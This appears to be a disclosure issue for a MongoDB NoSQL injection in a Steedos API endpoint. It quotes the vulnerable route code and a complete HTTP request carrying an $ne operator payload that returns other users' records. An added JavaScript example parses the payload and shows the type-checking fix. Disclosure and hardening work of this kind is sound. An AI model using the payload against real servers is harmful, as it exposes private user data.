The API does not strictly validate parameters before MongoDB (NoSQL) operations, which can lead to NoSQL injection. For details see
https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf
Most endpoints require authentication, so they cannot be exploited without logging in; here is just one example.

Cause of the vulnerability

For example, server/packages/steedos_base.js contains the following code:

```javascript
JsonRoutes.add("post", "/api/collection/findone", function (req, res, next) {
    ...
    if (req.body) {
        userId = req.body["X-User-Id"];
        authToken = req.body["X-Auth-Token"];
    }
    ...
    model = req.body.model;
    selector = req.body.selector;
    options = req.body.options;
    space = req.body.space;
    ...
    space_user = db.space_users.findOne({ user: userId, space: space });
    ...
```

req.body.* can be an object, so MongoDB query operators such as $ne (https://docs.mongodb.com/manual/reference/operator/query/) can be used.
By constructing a parameter such as X-User-Id[$ne]=1, the value actually passed in becomes {user: {"$ne":"1"},...},
which makes it possible to query an arbitrary space_user and return that user's information.

Reproduction steps

```http
POST /api/collection/findone HTTP/1.1
Host: <**>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: <**>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

X-Auth-Token=1&X-User-Id[$ne]=1&space[$ne]=1&model=space_users
```

Recommendation: parameter types should be validated before the NoSQL operation.
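The following is an added example, not code from the issue or from the Steedos project. It shows the two halves of the report in runnable form: how a urlencoded body in bracket notation is turned into a MongoDB operator object, and what the recommended type check looks like when it runs before the selector is built. The small form parser is a constructed stand-in for an "extended" body parser (the real middleware is not part of this example), and the field names `X-User-Id`, `space` and the selector shape `{ user, space }` mirror the code quoted above.

```javascript
// Added example for this report (not Steedos code): shows how a form body in
// bracket notation becomes a MongoDB operator object, and the type check that
// should run before such values reach a selector. The parser below is a
// constructed stand-in for an "extended" urlencoded body parser.

// Parse application/x-www-form-urlencoded with one level of bracket notation,
// so "a[$ne]=1" becomes { a: { "$ne": "1" } } exactly as the report describes.
function parseFormBody(raw) {
  const body = {};
  for (const pair of raw.split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const key = decodeURIComponent(eq === -1 ? pair : pair.slice(0, eq));
    const value = eq === -1 ? '' : decodeURIComponent(pair.slice(eq + 1));
    const m = /^([^\[]+)\[([^\]]*)\]$/.exec(key);
    if (m) {
      const [, name, sub] = m;
      if (typeof body[name] !== 'object' || body[name] === null) body[name] = {};
      body[name][sub] = value;
    } else {
      body[key] = value;
    }
  }
  return body;
}

// True if any key in the (possibly nested) value starts with '$', i.e. is a
// MongoDB query operator; useful as a last-line check or a detection rule.
function containsOperator(value) {
  if (value === null || typeof value !== 'object') return false;
  return Object.entries(value).some(
    ([k, v]) => k.startsWith('$') || containsOperator(v)
  );
}

// Vulnerable shape from the report: body values copied straight into the selector.
function buildSelectorUnsafe(body) {
  return { user: body['X-User-Id'], space: body.space };
}

// Hardened shape: each selector value must be a non-empty plain string, so an
// object such as { "$ne": "1" } is rejected before any query is built.
function buildSelectorSafe(body) {
  const selector = { user: body['X-User-Id'], space: body.space };
  for (const [field, value] of Object.entries(selector)) {
    if (typeof value !== 'string' || value.length === 0) {
      throw new TypeError(`selector field "${field}" must be a non-empty string`);
    }
  }
  return selector;
}

// Constructed sample bodies: the payload quoted in the report and a normal request.
const INJECTED_BODY = 'X-Auth-Token=1&X-User-Id[$ne]=1&space[$ne]=1&model=space_users';
const NORMAL_BODY = 'X-Auth-Token=t0ken&X-User-Id=u123&space=s456&model=space_users';

// Run one body through both builders and report what each would hand to MongoDB.
function evaluate(rawBody) {
  const body = parseFormBody(rawBody);
  const unsafe = buildSelectorUnsafe(body);
  let safe = null;
  let rejected = null;
  try {
    safe = buildSelectorSafe(body);
  } catch (err) {
    rejected = err.message;
  }
  return { unsafeHasOperator: containsOperator(unsafe), unsafe, safe, rejected };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(evaluate(INJECTED_BODY), null, 2));
  console.log(JSON.stringify(evaluate(NORMAL_BODY), null, 2));
}
```

Running the file prints, for the injected body, an unsafe selector `{ user: { "$ne": "1" }, space: { "$ne": "1" } }` flagged as containing an operator and a `rejected` message from the hardened builder; for the normal body both builders agree on `{ user: "u123", space: "s456" }`. The string check is deliberately placed on the fields that reach the selector rather than on the raw body, since that is where the type assumption is actually made.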
MongoDB NoSQL injection issue #1245
0fabd95
Do not depend on X-User-Id #1245
1238b8d
sunhaolin